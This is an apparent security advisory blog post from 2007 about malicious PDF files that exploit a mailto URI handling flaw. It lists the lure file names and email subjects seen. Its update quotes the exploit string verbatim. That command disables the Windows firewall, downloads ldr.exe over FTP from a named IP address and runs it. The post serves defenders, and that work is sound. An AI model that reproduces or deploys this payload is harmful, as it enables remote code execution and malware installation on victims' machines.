PDF mailto exploit documents in the wild

Published: 2007-10-23
Last Updated: 2007-10-24 00:18:25 UTC
by Adrien de Beaupre (Version: 2)
0 comment(s)

The vulnerability initially reported here http://isc.sans.org/diary.html?storyid=3406 and confirmed here (with workaround) http://isc.sans.org/diary.html?storyid=3477 and patched here http://isc.sans.org/diary.html?storyid=3531 now appears to have been spotted in the wild. The proof of concept code had been released, and a number of people have reported receiving the PDFs which exploit the vulnerability. Obviously please patch, apply the workarounds, and/or ensure you can detect and block the exploit. File names seen so far are "BILL.pdf" and "INVOICE.pdf".

Thanks Juha-Matti!

Update 1

The current exploit seen follows the following format (spaces added so anti-virus won't trigger):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

Essentially it disables the Windows native firewall, uses FTP to download a file, and execute it. Gotcha.

Additional file names: "YOUR_BILL.pdf" and "STATEMET.pdf" some subject lines have been "INVOICE alacrity" "STATEMET indigene" and "INVOICE depredate"

Thanks Bojan!

Adrien de Beaupré
Bell Canada




0 comment(s)


Diary Archives